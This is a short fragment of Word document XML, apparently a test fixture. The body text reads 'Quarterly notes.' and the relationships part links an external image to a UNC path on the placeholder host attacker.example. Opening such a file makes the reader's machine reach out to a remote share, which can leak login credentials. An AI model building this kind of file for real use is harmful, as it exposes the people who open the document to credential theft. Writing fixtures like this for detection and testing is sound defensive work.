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Quarterly notes.</w:t>
      </w:r>
    </w:p>
  </w:body>
</w:document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\\attacker.example\share\logo.png" TargetMode="External"/></Relationships>
</file>